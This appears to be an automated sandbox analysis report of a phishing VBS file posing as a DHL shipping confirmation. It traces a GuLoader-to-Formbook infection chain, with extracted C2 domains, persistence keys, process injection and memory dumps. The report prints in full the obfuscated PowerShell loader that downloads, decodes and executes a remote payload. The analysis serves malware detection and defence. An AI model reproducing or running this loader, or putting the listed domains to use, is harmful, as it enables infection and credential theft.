Analysis
max time kernel: 147s
max time network: 122s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 28-03-2024 02:05
Static task: static1
Behavioral task: behavioral1
Sample: DHL-SHIPPING-CONFIRMATION-383837747733.vbs
Resource: win7-20240221-en
Behavioral task: behavioral2
Sample: DHL-SHIPPING-CONFIRMATION-383837747733.vbs
Resource: win10v2004-20240226-en
General
Target: DHL-SHIPPING-CONFIRMATION-383837747733.vbs
Size: 10KB
MD5: 83741a566ed8044f4692b4070986ecb9
SHA1: 921fa0b4bbe043a6a2a9b972bceab1088acda6f5
SHA256: aeff431cde6f10580b664967efe9793aa19130934b0e9f9d01d152e028fa3f2a
SHA512: a4449f4ec76b25d0a8802afb93791c4522b1fcd14401349172d57ca93817a249b6fa8df2119b76ea3f76a9826592e54de17f0012b9d24d3fcc07bce7fa37bbde
SSDEEP: 192:2M+7O579hFNNFU4wlr4ZRR/038AVVtkfLda+V9+ZMoce5QmDRs4ngSN+:2M+7O57dFU4wlr4r038AVQfL4+SZt13w
Malware Config
Extracted
Family: formbook
Version: 4.1
Campaign ID: tt15
Domains:
wholeplant.online
pornimmersive.site
gelcreativecollabs.com
novanewsbrasil.com
prefabhomes2024th.space
stelautosrl.online
wellnessmindfulhealth.com
qhgly.lol
thefutureshub.com
compk5l.info
insurance-offers.com
de-solarroof.today
pn-pasarwajo.com
rachelelice.com
inkninsight.com
innoviewclinical.com
austrofoods.com
mayanlanguagesaccess.co
ablaiserver.com
staffcanteencook200.buzz
reiniimi.com
nnaed.com
deliciusmalta.com
claudiaschneidercoaching.com
bigmanhauling.com
likesband.com
9hu5ewho.shop
perfectedmediagb.com
dozalfm.com
lcloud-com-website-s.us
scpotcar.com
regnacionalpremiums.site
voltenergieconseil.com
blueheartsofsoflo.net
theoasis-villas.com
offer-confirm.com
infocomptevitale.net
spaselah.com
m5845.cc
killianjacobs.autos
shopnestaus.com
aisamodel.com
casinoartimage.com
baribari-ramen.shop
workoutwitch.com
thetechsolutionhub.com
dickinsonnewhope.com
bushiroad-cn.com
self-divorce.com
prideweek.io
maxhealthguardianship.com
stephendempseysummit.com
ahtranquility.online
thesteambox.co
thecreativenoteboard.com
glechiu.xyz
carrierbagcreatures.com
iyadirphotographie.com
roykelley.com
horizonherald.cfd
boundinfear.com
anaeinigo.com
somo44.shop
vaahghartechsolutions.com
dpxj888.com
Signatures

Guloader, Cloudeye
A shellcode based downloader first seen in 2020.

Formbook payload (4 IoCs)
resource | yara_rule
behavioral1/memory/1480-44-0x0000000000400000-0x0000000000581000-memory.dmp | formbook
behavioral1/memory/1480-47-0x0000000000400000-0x0000000000581000-memory.dmp | formbook
behavioral1/memory/1556-56-0x00000000000D0000-0x00000000000FF000-memory.dmp | formbook
behavioral1/memory/1556-58-0x00000000000D0000-0x00000000000FF000-memory.dmp | formbook
Adds policy Run key to start application (2 TTPs, 1 IoCs)
Processes: colorcpl.exe
description | ioc | process
Key created | \Registry\User\S-1-5-21-330940541-141609230-1670313778-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | colorcpl.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
Processes: colorcpl.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\IPAHDLU = "C:\\Program Files (x86)\\windows mail\\wab.exe" | colorcpl.exe
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
Processes: wab.exe
pid | process
1480 | wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
Processes: powershell.exe, wab.exe
pid | process
2544 | powershell.exe
1480 | wab.exe
Suspicious use of SetThreadContext (3 IoCs)
Processes: powershell.exe, wab.exe, colorcpl.exe
description | pid | process | target process
PID 2544 set thread context of 1480 | 2544 | powershell.exe | wab.exe
PID 1480 set thread context of 1216 | 1480 | wab.exe | Explorer.EXE
PID 1556 set thread context of 1216 | 1556 | colorcpl.exe | Explorer.EXE
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Modifies Internet Explorer settings
Processes: colorcpl.exe
description | ioc | process
Key created | \Registry\User\S-1-5-21-330940541-141609230-1670313778-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 | colorcpl.exe
Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes: powershell.exe, powershell.exe, wab.exe, colorcpl.exe
pid | process | occurrences
2608 | powershell.exe | 1
2544 | powershell.exe | 1
1480 | wab.exe | 2
1556 | colorcpl.exe | 14
Suspicious behavior: MapViewOfSection (8 IoCs)
Processes: powershell.exe, wab.exe, colorcpl.exe
pid | process | occurrences
2544 | powershell.exe | 1
1480 | wab.exe | 3
1556 | colorcpl.exe | 4
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes: powershell.exe, powershell.exe, wab.exe, colorcpl.exe
description | pid | process
Token: SeDebugPrivilege | 2608 | powershell.exe
Token: SeDebugPrivilege | 2544 | powershell.exe
Token: SeDebugPrivilege | 1480 | wab.exe
Token: SeDebugPrivilege | 1556 | colorcpl.exe
Suspicious use of WriteProcessMemory (22 IoCs)
Processes: WScript.exe, powershell.exe, powershell.exe, Explorer.EXE, colorcpl.exe
description | pid | process | target process | occurrences
PID 2320 wrote to memory of 2608 | 2320 | WScript.exe | powershell.exe | 3
PID 2608 wrote to memory of 2544 | 2608 | powershell.exe | powershell.exe | 4
PID 2544 wrote to memory of 1480 | 2544 | powershell.exe | wab.exe | 6
PID 1216 wrote to memory of 1556 | 1216 | Explorer.EXE | colorcpl.exe | 4
PID 1556 wrote to memory of 2108 | 1556 | colorcpl.exe | Firefox.exe | 5
Processes

Level 1: C:\Windows\Explorer.EXE
Command line: C:\Windows\Explorer.EXE
- Suspicious use of WriteProcessMemory

Level 2: C:\Windows\System32\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DHL-SHIPPING-CONFIRMATION-383837747733.vbs"
- Suspicious use of WriteProcessMemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Uligheden;++$Uligheden;$Uligheden=$Uligheden-1;Function Semiobjectively ($Eksekutionspelotonernes){$Borers=5;$Borers++;For($Adresseringens=5; $Adresseringens -lt $Eksekutionspelotonernes.Length-1; $Adresseringens+=$Borers){$Hydrophthalmia = 'substring';$Typecasting=$Eksekutionspelotonernes.$Hydrophthalmia.Invoke($Adresseringens, 1);$Tommelfingernegls=$Tommelfingernegls+$Typecasting}$Tommelfingernegls;}$Disimagine=Semiobjectively 'stokahFavnet,eriotterm,p S,ip:Forko/Vedhf/PhytodEndern ChipvOnflok ourn1 udg,.Skrali BuggnSkif.f.ibbeo Demi/ErnriwLaikapCubam-et rnaKej.edRutedmRaseri RundnAnemo/ Ren.K Predi .himoSa dew Sik aSchelyR nse.Fjo.asHel,lmFrembiRe un ';$Programvrten=$Disimagine.split([char]62);$Disimagine=$Programvrten[0];$Evittate=Semiobjectively 'GalvaiByrthe ExigxFacon ';$Vitasti = Semiobjectively 'Smrhu\Revsesover,yFljlssIne,owbronxoBussew .cal6Pytho4Blods\En wiWSa.dsi ellinA tovd.nertoSubcowVakresSad,ePPriveo ,rstw Freye Plu rBals.SCharthAntroeSkriflSm,dslPasto\Enw,evPaag 1Handi. Sati0S.arc\Cl ggpModaro.xotiwtegneeNipperTollms kabeh ,mphe WilylSautolOpsla.,trejeHuldax ejlmeIndis ';&($Evittate) (Semiobjectively 'Indre$Ove,mRFrgehg PaelnBlyaniAnnotnSuc,ugPloej=Lajla$ ArmeeGrundnNorthv M,ed:mor.lw acceiSodavnBasildChiliineighrWhite ') ;&($Evittate) (Semiobjectively 'Genal$E.epiV TogiiOverltOverramatems ReadtForecidisod=Phook$busheRStarfgNonenn KartimanuanLame.gHomeo+Scen.$vartaVBaissiDe,astAndiaaK,oons plystMour.i,lari ') ;&($Evittate) (Semiobjectively 'Buddi$InterLBowbeu palyxM trouChockrKo,reiTro ha jackn Ap.tc Attae.nfelsBkip, Fi le= Frit Fagl(Lastr(Rin,egU.derw Sp,emGemm,imaane JasigwOpsnuiUnvaun,mrbi3 Forn2 Cozi_ BegrpUtensr CompoWhirscPatrie Liers Cho s,mbus Pukke-FilanF Ungo Sy taPHiragrPaleooRedrecYndigeCoat,sSlitts Dux,IProfidFa,ve= Ante$ .ekn{ FravP KeetIUnoxiDsylvi}Inkon)Bagaa. 
MmepCS.bquoDansemElimamVirelaNonirnM.alfdPastuLInhali F rgnUnc.aeBloms)Gaede O ls-kapacsRespapO.matlCalcii Natvt Drui M,gda[GuidecAfse,hHaeftaWhi zrD plo]Winte3 Aft.4 Sttt ');&($Evittate) (Semiobjectively ' Thar$ TercKPallavU.styaH lybdLousurDambraVelgrt krigkLeucoiAugu.l MobioBa.anmBeredePu sytHaus.eMacusr StfreS.annn NsehsCarr. Turnh=Spedi Anima$ ProtLTo ipuSlotsxAbsolu,eprorMa.ieiKol,aaAeromnSvmmecRes ceMa.cesKumen[Gnave$SvejfLBrachuVi.rixBkneruSubjerI dvniHomomaLhiamnAmoricAfspnebaandsF jit.RunhocseileoklannuLabronInf,rthooga-.orno2Solde] Sage ');&($Evittate) (Semiobjectively 'parge$Sa,ktSParilkPercua.gacek as,hs Russp.igeniSejlsl W,gwl UndeeBelovrr.frasku st=Ident(TootsTLigh e prisstu gstPolar-hjlp.PBilleaGem,tt VacchVeksl Ste i$FordyV U,reiDistatS.ndsaNabbes DenutCretiiHom l)Morso Se,ia-BalloARe tanderr,dSkim Elute(Regar[GrecoISjusknbutt,tStemmPIndi.t SweerDisci] Dolk: ,kan:VandbsCrepeiPleurzAabnieBodel valgd- ParteViderqSkald I.akt8Sassa)Subsc ') ;if ($Skakspillers) {.$Vitasti $Kvadratkilometerens;} else {;$Snoreassistenter=Semiobjectively 'cynogS schet,adetaAnstirBowgrt Ai b-corpoBDod iiFremstResposHyperTMavo,rbrannaFlersn astsToplefBetuteFd.elr Seke Stamp-AntenS Numio speruStvfnrM.derc Mit esubgr Neksu$TitoiDBret.igeodesImpaii din mUvrdiaPhenygUdpani ChronG ovfe Bjrg plene-Sti.eDKommpeLvfalsCou,ltTetaniPre,rnSpontaMetant everiDebauoClitonCharp Impof$R,valR PropgRandtnUundvi intenO.reag Lou. 
';&($Evittate) (Semiobjectively 'Barne$ ndtRVaccigPardon.tankiKom unAndrigT sid= Fa.t$Pastee,berenDejtrvN kol:Debata Ta,ipPhot.pYoungdBailiaAftertRestgaTh,re ') ;&($Evittate) (Semiobjectively ' romI StatmA.grap GelooEpoperworkstDatte- PlouMT rnsowaysbdOrie u Tab.l mvieRa.ba By,geB Tenai Mi,ptResols FataT busbrMarmaaEncr,nSpitcsKyanifbrom.eB.bylrTopop ') ;$Rgning=$Rgning+'\Lillebilen.Uno';while (-not $Slab) {&($Evittate) (Semiobjectively 'S ytt$ B.gaSE viplCalcaaLngdebSelle=ce.at(PrescT EloxePu pesGr,sbtFoolh-RattePTelefaMixu.tunc ahKipp Glago$PhiliRGladng Liven bankiAfrenn,yrrhgChank)Dvsud ') ;&($Evittate) $Snoreassistenter;&($Evittate) (Semiobjectively 'TenanSAs.autParama Coc.rBreevtSulte-ForsvSs lenlNvnineDastaeStar,pPulm. begy5Vite. ');$Disimagine=$Programvrten[$Charismas++%$Programvrten.count];}&($Evittate) (Semiobjectively 'mitoc$Tree,TCoontrHaa diHandefS,rafo,yster Tur.nGullaiPerspaA pri Overs=arb j bandeG.anaieStjertStu i-RegnsCAdipooAuto n Sammt RetseChondnPi,lotUdbyd Pedal$.ngosRQu,ckg bloonSkopuiForurn Stilg.ulla ');&($Evittate) (Semiobjectively 'Si ht$OverpUH.merdGene.f IntiralheneOrg,nnTbruddGrns eSk.es1 Di.g3Forbe1 Blok ,eci=Skils lys g[projeSPartiyGardes DepotB.nbueSpicimSvnls.S bneC TjanoUrydpnMill,vb ppee In.orWedgetFlygl]Quinq:Skole:F,rskFInex raposto pbygm E uuB SynkaHaandstelefeDeter6Bo tk4 KapiS ,ladtMarmorUbefoistenhn integHun,r(Katho$ blaaT portrShrofiGyn ef S mkoSprourPa.vin Havfi TilbaDorma)Sm.re ');&($Evittate) (Semiobjectively ' Hykl$ProcuAFin,ncTar rq TatuuAnjaniBusedrParkeeElevarBer.es,retr Nonf =Fiss. Stil.[Med.iSSq,amyVelkosComprtBenf ecott,m nqui. vetyTStam.eC.ntrxUdesttHjemk.CiselEA rivnRawbocDicraoVelvedSt,liiF,repnC lengDrble]Salam:Du,fo: MetaAFluorSHenveC.fbrnI SkalIEncom. 
jeneG.mplee ParttPittcS,heatttoptyr TraniIn.umn BisegPhial(Pra i$Syph UPres d Westf S.jtrCharle demonCannadRoughe Mant1Samme3Af,gt1sabal) kovs ');&($Evittate) (Semiobjectively ' En r$DaemoCuncoioUnelinDig,msMbelptuo,dri BolitNonilu Ba,ktGallei TurpoMedden Tal.aAnarklSpaans M.al= Tryk$ deflAMetapcCa.thqLocaluBestiiPreprrUndeleTi borOmmatsKruk,. .pvasKlynguGalu bIntersYodletAlli rForuniKretunUnrheg .tri(Turco3Hippa0F.dno0 Afg 1B omb1E.ide4Tragu,.arti2,ugvg5Selac1 Kend6 Rest6Nbene) Afl. ');&($Evittate) $Constitutionals;}"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Uligheden;++$Uligheden;$Uligheden=$Uligheden-1;Function Semiobjectively ($Eksekutionspelotonernes){$Borers=5;$Borers++;For($Adresseringens=5; $Adresseringens -lt $Eksekutionspelotonernes.Length-1; $Adresseringens+=$Borers){$Hydrophthalmia = 'substring';$Typecasting=$Eksekutionspelotonernes.$Hydrophthalmia.Invoke($Adresseringens, 1);$Tommelfingernegls=$Tommelfingernegls+$Typecasting}$Tommelfingernegls;}$Disimagine=Semiobjectively 'stokahFavnet,eriotterm,p S,ip:Forko/Vedhf/PhytodEndern ChipvOnflok ourn1 udg,.Skrali BuggnSkif.f.ibbeo Demi/ErnriwLaikapCubam-et rnaKej.edRutedmRaseri RundnAnemo/ Ren.K Predi .himoSa dew Sik aSchelyR nse.Fjo.asHel,lmFrembiRe un ';$Programvrten=$Disimagine.split([char]62);$Disimagine=$Programvrten[0];$Evittate=Semiobjectively 'GalvaiByrthe ExigxFacon ';$Vitasti = Semiobjectively 'Smrhu\Revsesover,yFljlssIne,owbronxoBussew .cal6Pytho4Blods\En wiWSa.dsi ellinA tovd.nertoSubcowVakresSad,ePPriveo ,rstw Freye Plu rBals.SCharthAntroeSkriflSm,dslPasto\Enw,evPaag 1Handi. Sati0S.arc\Cl ggpModaro.xotiwtegneeNipperTollms kabeh ,mphe WilylSautolOpsla.,trejeHuldax ejlmeIndis ';&($Evittate) (Semiobjectively 'Indre$Ove,mRFrgehg PaelnBlyaniAnnotnSuc,ugPloej=Lajla$ ArmeeGrundnNorthv M,ed:mor.lw acceiSodavnBasildChiliineighrWhite ') ;&($Evittate) (Semiobjectively 'Genal$E.epiV TogiiOverltOverramatems ReadtForecidisod=Phook$busheRStarfgNonenn KartimanuanLame.gHomeo+Scen.$vartaVBaissiDe,astAndiaaK,oons plystMour.i,lari ') ;&($Evittate) (Semiobjectively 'Buddi$InterLBowbeu palyxM trouChockrKo,reiTro ha jackn Ap.tc Attae.nfelsBkip, Fi le= Frit Fagl(Lastr(Rin,egU.derw Sp,emGemm,imaane JasigwOpsnuiUnvaun,mrbi3 Forn2 Cozi_ BegrpUtensr CompoWhirscPatrie Liers Cho s,mbus Pukke-FilanF Ungo Sy taPHiragrPaleooRedrecYndigeCoat,sSlitts Dux,IProfidFa,ve= Ante$ .ekn{ FravP KeetIUnoxiDsylvi}Inkon)Bagaa. 
MmepCS.bquoDansemElimamVirelaNonirnM.alfdPastuLInhali F rgnUnc.aeBloms)Gaede O ls-kapacsRespapO.matlCalcii Natvt Drui M,gda[GuidecAfse,hHaeftaWhi zrD plo]Winte3 Aft.4 Sttt ');&($Evittate) (Semiobjectively ' Thar$ TercKPallavU.styaH lybdLousurDambraVelgrt krigkLeucoiAugu.l MobioBa.anmBeredePu sytHaus.eMacusr StfreS.annn NsehsCarr. Turnh=Spedi Anima$ ProtLTo ipuSlotsxAbsolu,eprorMa.ieiKol,aaAeromnSvmmecRes ceMa.cesKumen[Gnave$SvejfLBrachuVi.rixBkneruSubjerI dvniHomomaLhiamnAmoricAfspnebaandsF jit.RunhocseileoklannuLabronInf,rthooga-.orno2Solde] Sage ');&($Evittate) (Semiobjectively 'parge$Sa,ktSParilkPercua.gacek as,hs Russp.igeniSejlsl W,gwl UndeeBelovrr.frasku st=Ident(TootsTLigh e prisstu gstPolar-hjlp.PBilleaGem,tt VacchVeksl Ste i$FordyV U,reiDistatS.ndsaNabbes DenutCretiiHom l)Morso Se,ia-BalloARe tanderr,dSkim Elute(Regar[GrecoISjusknbutt,tStemmPIndi.t SweerDisci] Dolk: ,kan:VandbsCrepeiPleurzAabnieBodel valgd- ParteViderqSkald I.akt8Sassa)Subsc ') ;if ($Skakspillers) {.$Vitasti $Kvadratkilometerens;} else {;$Snoreassistenter=Semiobjectively 'cynogS schet,adetaAnstirBowgrt Ai b-corpoBDod iiFremstResposHyperTMavo,rbrannaFlersn astsToplefBetuteFd.elr Seke Stamp-AntenS Numio speruStvfnrM.derc Mit esubgr Neksu$TitoiDBret.igeodesImpaii din mUvrdiaPhenygUdpani ChronG ovfe Bjrg plene-Sti.eDKommpeLvfalsCou,ltTetaniPre,rnSpontaMetant everiDebauoClitonCharp Impof$R,valR PropgRandtnUundvi intenO.reag Lou. 
';&($Evittate) (Semiobjectively 'Barne$ ndtRVaccigPardon.tankiKom unAndrigT sid= Fa.t$Pastee,berenDejtrvN kol:Debata Ta,ipPhot.pYoungdBailiaAftertRestgaTh,re ') ;&($Evittate) (Semiobjectively ' romI StatmA.grap GelooEpoperworkstDatte- PlouMT rnsowaysbdOrie u Tab.l mvieRa.ba By,geB Tenai Mi,ptResols FataT busbrMarmaaEncr,nSpitcsKyanifbrom.eB.bylrTopop ') ;$Rgning=$Rgning+'\Lillebilen.Uno';while (-not $Slab) {&($Evittate) (Semiobjectively 'S ytt$ B.gaSE viplCalcaaLngdebSelle=ce.at(PrescT EloxePu pesGr,sbtFoolh-RattePTelefaMixu.tunc ahKipp Glago$PhiliRGladng Liven bankiAfrenn,yrrhgChank)Dvsud ') ;&($Evittate) $Snoreassistenter;&($Evittate) (Semiobjectively 'TenanSAs.autParama Coc.rBreevtSulte-ForsvSs lenlNvnineDastaeStar,pPulm. begy5Vite. ');$Disimagine=$Programvrten[$Charismas++%$Programvrten.count];}&($Evittate) (Semiobjectively 'mitoc$Tree,TCoontrHaa diHandefS,rafo,yster Tur.nGullaiPerspaA pri Overs=arb j bandeG.anaieStjertStu i-RegnsCAdipooAuto n Sammt RetseChondnPi,lotUdbyd Pedal$.ngosRQu,ckg bloonSkopuiForurn Stilg.ulla ');&($Evittate) (Semiobjectively 'Si ht$OverpUH.merdGene.f IntiralheneOrg,nnTbruddGrns eSk.es1 Di.g3Forbe1 Blok ,eci=Skils lys g[projeSPartiyGardes DepotB.nbueSpicimSvnls.S bneC TjanoUrydpnMill,vb ppee In.orWedgetFlygl]Quinq:Skole:F,rskFInex raposto pbygm E uuB SynkaHaandstelefeDeter6Bo tk4 KapiS ,ladtMarmorUbefoistenhn integHun,r(Katho$ blaaT portrShrofiGyn ef S mkoSprourPa.vin Havfi TilbaDorma)Sm.re ');&($Evittate) (Semiobjectively ' Hykl$ProcuAFin,ncTar rq TatuuAnjaniBusedrParkeeElevarBer.es,retr Nonf =Fiss. Stil.[Med.iSSq,amyVelkosComprtBenf ecott,m nqui. vetyTStam.eC.ntrxUdesttHjemk.CiselEA rivnRawbocDicraoVelvedSt,liiF,repnC lengDrble]Salam:Du,fo: MetaAFluorSHenveC.fbrnI SkalIEncom. 
jeneG.mplee ParttPittcS,heatttoptyr TraniIn.umn BisegPhial(Pra i$Syph UPres d Westf S.jtrCharle demonCannadRoughe Mant1Samme3Af,gt1sabal) kovs ');&($Evittate) (Semiobjectively ' En r$DaemoCuncoioUnelinDig,msMbelptuo,dri BolitNonilu Ba,ktGallei TurpoMedden Tal.aAnarklSpaans M.al= Tryk$ deflAMetapcCa.thqLocaluBestiiPreprrUndeleTi borOmmatsKruk,. .pvasKlynguGalu bIntersYodletAlli rForuniKretunUnrheg .tri(Turco3Hippa0F.dno0 Afg 1B omb1E.ide4Tragu,.arti2,ugvg5Selac1 Kend6 Rest6Nbene) Afl. ');&($Evittate) $Constitutionals;}"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
Level 5: C:\Program Files (x86)\windows mail\wab.exe
Command line: "C:\Program Files (x86)\windows mail\wab.exe"
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\Windows\SysWOW64\colorcpl.exe
Command line: "C:\Windows\SysWOW64\colorcpl.exe"
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
Level 3: C:\Program Files\Mozilla Firefox\Firefox.exe
Command line: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0ZDLETEHLEQQSX3M6TCZ.temp
Filesize: 7KB
MD5: 6a98e06e273ab409c8247f63b3043337
SHA1: ab0c1bdbffb6646def7a5244d2d4111fcccc7a50
SHA256: 0d03d22e94b308278d4d3183a5091c3c77749f6012f8c6f85f5c89259400c49b
SHA512: 9d343a00accbdc96bf6e95621877b2ffd5a2be35345d964e3af4f47c86f6456216ae1d4ac59a5ca39bd125101382d634e74b825001072bdae69411df72d0b810

memory/1216-48-0x00000000029A0000-0x0000000002AA0000-memory.dmp  Filesize: 1024KB
memory/1216-52-0x0000000006810000-0x0000000006926000-memory.dmp  Filesize: 1.1MB
memory/1480-40-0x0000000000EF0000-0x0000000002935000-memory.dmp  Filesize: 26.3MB
memory/1480-51-0x0000000000EF0000-0x0000000002935000-memory.dmp  Filesize: 26.3MB
memory/1480-47-0x0000000000400000-0x0000000000581000-memory.dmp  Filesize: 1.5MB
memory/1480-46-0x000000001DF50000-0x000000001E253000-memory.dmp  Filesize: 3.0MB
memory/1480-44-0x0000000000400000-0x0000000000581000-memory.dmp  Filesize: 1.5MB
memory/1480-43-0x0000000077A26000-0x0000000077A27000-memory.dmp  Filesize: 4KB
memory/1480-42-0x00000000779F0000-0x0000000077AC6000-memory.dmp  Filesize: 856KB
memory/1480-41-0x0000000077800000-0x00000000779A9000-memory.dmp  Filesize: 1.7MB
memory/1480-50-0x00000000000F0000-0x0000000000104000-memory.dmp  Filesize: 80KB
memory/1556-53-0x00000000008F0000-0x0000000000908000-memory.dmp  Filesize: 96KB
memory/1556-55-0x00000000008F0000-0x0000000000908000-memory.dmp  Filesize: 96KB
memory/1556-58-0x00000000000D0000-0x00000000000FF000-memory.dmp  Filesize: 188KB
memory/1556-63-0x0000000000840000-0x00000000008D3000-memory.dmp  Filesize: 588KB
memory/1556-68-0x0000000000840000-0x00000000008D3000-memory.dmp  Filesize: 588KB
memory/1556-56-0x00000000000D0000-0x00000000000FF000-memory.dmp  Filesize: 188KB
memory/1556-57-0x0000000001FE0000-0x00000000022E3000-memory.dmp  Filesize: 3.0MB
memory/2544-30-0x0000000005BD0000-0x0000000005BD1000-memory.dmp  Filesize: 4KB
memory/2544-34-0x0000000073840000-0x0000000073DEB000-memory.dmp  Filesize: 5.7MB
memory/2544-37-0x0000000077800000-0x00000000779A9000-memory.dmp  Filesize: 1.7MB
memory/2544-38-0x00000000779F0000-0x0000000077AC6000-memory.dmp  Filesize: 856KB
memory/2544-39-0x0000000006390000-0x0000000007DD5000-memory.dmp  Filesize: 26.3MB
memory/2544-12-0x0000000073840000-0x0000000073DEB000-memory.dmp  Filesize: 5.7MB
memory/2544-28-0x0000000073840000-0x0000000073DEB000-memory.dmp  Filesize: 5.7MB
memory/2544-14-0x0000000073840000-0x0000000073DEB000-memory.dmp  Filesize: 5.7MB
memory/2544-13-0x00000000005A0000-0x00000000005E0000-memory.dmp  Filesize: 256KB
memory/2544-32-0x0000000006390000-0x0000000007DD5000-memory.dmp  Filesize: 26.3MB
memory/2544-45-0x0000000006390000-0x0000000007DD5000-memory.dmp  Filesize: 26.3MB
memory/2544-33-0x00000000005A0000-0x00000000005E0000-memory.dmp  Filesize: 256KB
memory/2544-31-0x0000000006390000-0x0000000007DD5000-memory.dmp  Filesize: 26.3MB
memory/2608-25-0x0000000002880000-0x0000000002900000-memory.dmp  Filesize: 512KB
memory/2608-49-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp  Filesize: 9.6MB
memory/2608-29-0x0000000002880000-0x0000000002900000-memory.dmp  Filesize: 512KB
memory/2608-27-0x0000000002880000-0x0000000002900000-memory.dmp  Filesize: 512KB
memory/2608-26-0x0000000002880000-0x0000000002900000-memory.dmp  Filesize: 512KB
memory/2608-4-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp  Filesize: 9.6MB
memory/2608-24-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp  Filesize: 9.6MB
memory/2608-9-0x0000000002880000-0x0000000002900000-memory.dmp  Filesize: 512KB
memory/2608-8-0x0000000002560000-0x0000000002568000-memory.dmp  Filesize: 32KB
memory/2608-7-0x000000001B260000-0x000000001B542000-memory.dmp  Filesize: 2.9MB
memory/2608-6-0x0000000002880000-0x0000000002900000-memory.dmp  Filesize: 512KB
memory/2608-5-0x0000000002880000-0x0000000002900000-memory.dmp  Filesize: 512KB